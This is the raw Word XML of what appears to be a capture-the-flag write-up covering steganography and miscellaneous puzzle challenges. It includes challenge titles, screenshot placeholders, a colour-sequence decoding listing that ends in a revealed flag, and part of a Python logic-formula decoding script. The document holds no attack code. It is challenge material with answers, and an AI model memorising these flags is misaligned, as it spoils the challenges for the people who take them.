          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617944">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Get python script from the hint video and fix it to get the flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60427214" w14:textId="16537BF4" w:rsidR="00617944" w:rsidRDefault="00617944" w:rsidP="00617944">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc213279025"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00617944">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00617944">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100-3 Low Tide at Midnight</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w14:paraId="20395EC4" w14:textId="0C3DE2D2" w:rsidR="00617944" w:rsidRPr="00617944" w:rsidRDefault="00617944" w:rsidP="00617944">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617944">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D3359FF" wp14:editId="6D17B63E">
            <wp:extent cx="3581900" cy="4801270"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1094594344" name="Picture 1" descr="A screenshot of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94344" name="Picture 1" descr="A screenshot of a q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4252" w14:textId="0E2594E9" w:rsidR="00617944" w:rsidRDefault="00C96312" w:rsidP="00617944">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc213279026"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C96312">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C96312">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200-1 Needle in the Chorus</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="57217CA4" w14:textId="65B73E58" w:rsidR="00C96312" w:rsidRPr="00C96312" w:rsidRDefault="00C96312" w:rsidP="00C96312">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C96312">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41DFB246" wp14:editId="187F8F1C">
            <wp:extent cx="4448796" cy="2152950"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1236888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884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B032" w14:textId="29B4F8AF" w:rsidR="00617944" w:rsidRDefault="001E46EE" w:rsidP="00617944">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc213279027"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E46EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E46EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 300-1 Ouroboros</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="7ABCD753" w14:textId="40411AD7" w:rsidR="001E46EE" w:rsidRPr="001E46EE" w:rsidRDefault="001E46EE" w:rsidP="001E46EE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001E46EE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CAF7B7B" wp14:editId="6E86123C">
            <wp:extent cx="3448531" cy="1343212"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="205764853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8533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9D13" w14:textId="65173C9B" w:rsidR="00617944" w:rsidRDefault="00714F3A" w:rsidP="00617944">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc213279028"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00714F3A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00714F3A">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 300-2 Blind Man's Bluff</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="489744D7" w14:textId="69CDAEB4" w:rsidR="00714F3A" w:rsidRPr="00714F3A" w:rsidRDefault="00714F3A" w:rsidP="00714F3A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00714F3A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12B42089" wp14:editId="718FFF31">
            <wp:extent cx="2800741" cy="2048161"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="347105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512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600B" w14:textId="3FBA7882" w:rsidR="00714F3A" w:rsidRDefault="003B1F95" w:rsidP="003B1F95">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc213279029"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B1F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Stego</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B1F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 400 The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B1F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Weight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003B1F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003B1F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Silence</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B5BBA26" w14:textId="09015026" w:rsidR="00D620EB" w:rsidRPr="00D620EB" w:rsidRDefault="00D620EB" w:rsidP="00D620EB">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003B1F95">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="126C7D87" wp14:editId="67184E9A">
            <wp:extent cx="3753374" cy="1838582"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="57157648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6486" name="Picture 1" descr="A screenshot of a computer erro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8081" w14:textId="77777777" w:rsidR="003B1F95" w:rsidRDefault="003B1F95" w:rsidP="003B1F95">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A139431" w14:textId="77777777" w:rsidR="002460A7" w:rsidRDefault="002460A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Consolas" w:cstheme="majorBidi"/>
          <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc213279030"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF17405" w14:textId="360FE010" w:rsidR="00E82065" w:rsidRDefault="00D41266" w:rsidP="00E82065">
      <w:pPr>
        <w:pStyle w:val="Heading2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lastRenderedPageBreak/>
        <w:t>Misc</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="0BFC9AD1" w14:textId="77777777" w:rsidR="00E82065" w:rsidRPr="0013654D" w:rsidRDefault="00E82065" w:rsidP="00E82065">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CC03D6" w14:textId="60FADB6A" w:rsidR="00E82065" w:rsidRPr="0013654D" w:rsidRDefault="00F86CFF" w:rsidP="00E82065">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc213279031"/>
      <w:r w:rsidRPr="00F86CFF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Misc 100-2 The Seven Year Itch</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="7D305CC0" w14:textId="67272061" w:rsidR="00617944" w:rsidRDefault="00F86CFF" w:rsidP="00243F90">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F86CFF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63122278" wp14:editId="186A0BC4">
            <wp:extent cx="2619741" cy="2743583"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1238676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607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0842" w14:textId="47E2936E" w:rsidR="00BB148F" w:rsidRDefault="00E667AD" w:rsidP="00BB148F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc213279032"/>
      <w:r w:rsidRPr="00E667AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Misc 200-1 Mason, In Light</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="58779790" w14:textId="439B9352" w:rsidR="00BB148F" w:rsidRPr="00BB148F" w:rsidRDefault="00BB148F" w:rsidP="00BB148F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB148F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="426F798B" wp14:editId="3C190BD1">
            <wp:extent cx="3820058" cy="971686"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="7687732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73268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BCD1" w14:textId="5D7D7657" w:rsidR="00BB148F" w:rsidRPr="007C665B" w:rsidRDefault="007C665B" w:rsidP="00BB148F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc213279033"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> 200-2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Mouthful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>Marbles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4536BE2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00.100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029658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00.239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F2824C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00.417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21816D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00.545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130746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00.695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AEE151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00.801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AAB06D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00.934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E33366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01.068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DBA2F3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 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01.221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AB2DE4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01.302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B05F63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01.461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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC3DDE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01.626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B24775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01.803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102A2F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01.952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D32A23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02.025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A85F29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02.139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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB7A12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02.304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2AD63F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02.477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0E04FF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19.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02.621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867DB9F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02.726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3611B0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02.817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F56EB8F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02.898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49784C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03.059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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CD5FC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03.228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8DFD91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03.365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E99117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03.495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140CE1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03.622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E2F0E7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28.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03.761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E4BABD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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 29.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03.894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marble29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80C86E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04.053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39F914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04.118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B94158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04.187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B0B78C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04.299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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7225006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04.442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08D12F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04.527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F1C389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04.600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8B2A8B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04.696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8FEEAA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04.781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67D5D7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39.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04.898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marble39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27772A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05.053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</w:p>
    <w:p w14:paraId="3B77258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05.230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4E754E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05.409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9B02C5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05.542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6A2792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05.701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yellow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</w:p>
    <w:p w14:paraId="720D80D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05.832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B14852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05.970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D4438B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06.129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D40129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06.279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E1592A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49.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06.433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marble49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CA7F72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06.567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2C2190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06.685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B478E8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06.860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334324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06.923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479BF2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07.086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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA75AE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07.212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857A6B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07.366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5A4718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07.459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0A361B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07.535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6E798A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59.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07.635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marble59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DD7C78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07.799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A0DB0B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07.869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A40A12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07.953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C729AF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08.069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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AF30F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08.198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2F5977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08.312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2C1A5F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08.427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A091C3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08.494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A8B82B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08.635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5230E3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69.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08.754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marble69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CE5E68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08.858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AC9442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08.966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6492D3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09.034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059748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09.120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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D7F9B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09.225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293D4C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09.302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C575E7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09.432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ED0CD1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09.583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B58902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09.750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F9EBC6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79.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09.852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marble79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7AE70B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09.962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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2615C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10.101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21D9D0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10.280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51ED2F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10.419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yellow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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F2B8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10.568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18510D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10.697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8E3D03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10.796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6B6913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10.955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4EE95C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11.066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FF5754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89.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11.237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marble89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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0C0D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11.342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011E93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11.476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A2CD44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11.554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4D84D7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11.693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9214F9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11.858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DF7EB0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11.953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B00B08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12.110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481195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12.265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7B5E07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12.355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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4771287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 99.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12.464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marble99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B2A6B5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12.567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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0565E4F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12.637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10CCBB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12.714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2EF0C7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lastRenderedPageBreak/>
        <w:t xml:space="preserve">103.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12.894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7BEB9F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12.979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AF0955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13.120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A9EF4D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13.236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F22BC3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13.310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29B25A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13.455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4FF6C6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109.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13.546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marble109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5ED856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13.644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422A04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13.710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F6C5713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13.832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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A55817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13.993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D53AA8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14.171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DC2258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14.318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C27A5F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14.487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8176F8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14.633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61DF2E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14.712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5FD04A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119.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14.836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marble119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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A847FF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14.994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0DEC67F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15.091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yellow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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D71CD3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15.153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1DA204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15.223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8151C3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15.402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CE803F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15.520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BED8F2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15.674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3996BE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15.826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FCDB1F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15.888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13064C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129.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15.970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marble129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8964A3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16.131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8A9A40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16.215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F06733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16.295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57DDFB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16.385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8FB485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16.541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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B121C0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16.629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0CAE34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16.748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27E22C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16.899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C096CD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17.062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0A2123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139.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17.173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marble139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4A1B4D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17.319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AA3E61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17.418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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBFB4F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17.574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18F084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17.688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73D78D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17.848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C50A86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18.024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yellow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UWSP_CHAIN_OF_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D59D71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18.122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A9CFBA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18.195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36FD46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18.325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434EC0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149.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18.467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marble149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D4FBC9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18.643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7036E0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18.754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9A02B8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18.887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UWSP_CHAIN_OF_F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B39E8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19.023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5D6A1B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19.138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607250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19.240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B2449D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19.408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A30D3AF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19.538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E35A49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19.657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AF8CBD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159.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19.777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marble159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5AFCDE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19.932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47B84A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20.016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19D54D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20.085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BCD535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20.154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UWSP_CHAIN_OF_FO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F03EFA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20.222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50D9D7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20.285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65F39F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20.448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E40BBF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20.594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4779B6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20.770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B92238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169.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20.861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marble169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06A9D3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20.928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51EC57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21.057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8892DD5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21.187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1B0290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21.366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E23794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21.440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1F0F41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21.608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3D1A321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21.751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C6BCB0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lastRenderedPageBreak/>
        <w:t xml:space="preserve">177.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21.861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UWSP_CHAIN_OF_FO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E57D10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21.956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9FB20C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179.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22.124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marble179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22582A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22.246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241327E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22.307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DED8E2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22.463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UWSP_CHAIN_OF_FOL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D721B9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22.600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D9A6CD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22.761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84F4CDA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22.827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5544169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186.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22.991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marble186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302499E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187.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23.148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731A32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188.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23.255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marble188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64C5C98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189.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23.417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marble189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0A88F5C2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190.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23.532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marble190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348D25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191.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23.671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green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marble191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 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UWSP_CHAIN_OF_FOLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA3CA7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192.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23.784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marble192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12B5C5D6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193.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23.907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red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marble193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62735D2F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194.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23.991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marble194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7ECAC7FC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195. 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00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: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24.075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marble195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,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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44670EAD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196. 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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40AACDB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197. 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POCTF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UWSP_CHAIN_OF_FOOLS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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A23779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198. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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poctf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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{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uwsp_ch41n_0f_f00l5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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313708EE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199. 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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275E6290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200. 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green   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-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</w:p>
    <w:p w14:paraId="6AF7E874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201. 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red     </w:t>
      </w:r>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="006666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439DA88B" w14:textId="77777777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202. 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>blue    start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C733676" w14:textId="220E2625" w:rsidR="007C665B" w:rsidRPr="007C665B" w:rsidRDefault="007C66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4221024"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">203. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">yellow  special </w:t>
      </w:r>
      <w:r w:rsidRPr="007C665B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B6F5D" w14:textId="44485E29" w:rsidR="00BB148F" w:rsidRDefault="00215AD0" w:rsidP="00BB148F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc213279034"/>
      <w:r w:rsidRPr="00215AD0">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Misc 300-1 La Catedral</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="6EDB7364" w14:textId="465FC14B" w:rsidR="00215AD0" w:rsidRDefault="00215AD0" w:rsidP="00215AD0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00215AD0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="628725FF" wp14:editId="5224ECB4">
            <wp:extent cx="3829584" cy="2029108"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1997262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285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911E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hashlib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3648E4D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base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25800E1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3. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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proofErr w:type="gram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itertools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CAA014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0FF7747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Ciphertext provided in the challenge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FB60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"73RP4R137EN86P4BGR84846G6N0F9Y28071Z3F6DCX4SY0W79JPKSXK2CRJNZFCM6ZPFTWTKF3FJGKQYJWP7QGZTP7E00"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B46550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39A3E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Options - change if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42516FD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 9.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arrow_mode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'imp'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'imp' or 'nor'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493B86C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10.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nibble_order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'n3n2n1n0'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'n3n2n1n0' (n0 is LSB) or 'n0n1n2n3' (alternate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE890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1CC0B1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Logical primitives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD15B2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</w:p>
    <w:p w14:paraId="39A1AD3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(*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A7E377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</w:p>
    <w:p w14:paraId="2721F9E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D7D564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(*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2C62EA0F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</w:p>
    <w:p w14:paraId="69BA113F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23488E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54742EA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82D98E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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> 22.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584EA0A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5B768B0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arrow_mode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'imp'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DC13DC6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</w:p>
    <w:p w14:paraId="296BBCC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arrow_mode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'nor'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536153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6D84FD9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37BF72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raise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660066"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ValueError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arrow_mode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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must be 'imp' or 'nor'"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5C532F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93FFBA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Define pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A50C2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pages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</w:p>
    <w:p w14:paraId="34D11F7F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(A↔B)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¬D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B21C6F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2CF9AB3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"F_3"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(A→B)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(C→D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="012AFFA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"F_4"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(C↔D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699D8D5E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"F_5"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5C452CB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"F_6"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64D20894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"F_7"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(A↔¬C)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689FFF4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"F_8"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(A→(B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D10A3F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"F_9"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(¬A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(C→D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626E8FB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"F_10"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(D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¬A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468C7C0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"F_11"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D)↔(B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E1D5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"F_12"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7F393AF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"F_13"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(A→C)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(B→D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51973EA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"F_14"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(¬A↔B)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(¬C↔D)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324BD73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"F_15"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¬D)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¬C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B986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"F_16"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60621E8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"F_17"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¬D)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(B↔C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F38FD1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"F_18"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(A→¬B)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385297C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"F_19"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(¬A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539666A4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"F_20"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(A↔C)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¬D)</w:t>
      </w:r>
    </w:p>
